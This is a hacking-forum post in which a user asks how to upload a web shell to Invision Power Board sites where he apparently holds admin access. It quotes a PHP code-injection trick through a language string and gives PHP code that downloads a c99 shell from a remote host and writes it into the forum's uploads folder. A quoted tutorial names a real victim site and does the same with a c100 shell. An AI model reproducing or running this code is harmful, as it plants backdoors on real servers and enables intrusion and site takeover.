Mooka91 |
Advanced user |

 |
|
Joined: Aug 15, 2009 |
Posts: 73 |
|
|
|
 |
 |
 |
|
Hey guys,
Ive got a few IPB sites i have Root admin accounts on, Im wondering how i can Upload a shell.
I have tried this
waraxe wrote: |
This trick is working even against current IPB version!
Just go to admin-->Look and Feel-->Manage Languages
Then choose section, for example: public_help
Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"
Add some php code, so it becomes as:
Code: |
Choose a topic from the list, or search for a topic
${${phpinfo()}}
|
Save changes. Then go to help section:
http://localhost/ipb.3.0.0.rc2/index.php?app=core&module=help
... and php code will be executed
 |
To no avail, I have a feeling i am doing something wrong, Can somebody post me an In depth guide, or video... or something??
I am using
Code: | $linky="http://MYSITE/c99.txt";
$saved="/usr/home/www/site/public_html/forums/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
Using this shell
Code: | http://www.hack0wn.com/forum/index.php?topic=325.0 |
Thanks.
Edit:
Also tried this, But the English is shocking, To hard for me to understand.
Code: | Hi everybody
Today i make video tutorial upload shell on invision power board
Let's start
victim: http://www.malaysianwings.com/
first
Go to "Tools & Settings", select any of them, then press "Add New Setting"
next
then in line "Raw PHP code to eval before showing and saving?" write php code like this:
php code is:
$linky="http://yugj.biz/c100.txt";
$saved="/home/malaysi4/public_html/forum/c.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
$linky="link shell .txt"; ==> http://yugj.biz/c100.txt
$saved="path victim"; ==> path
i need find it
/home/malaysi4/public_html/ ==> path
the end.
made by YuGj.
|
|
|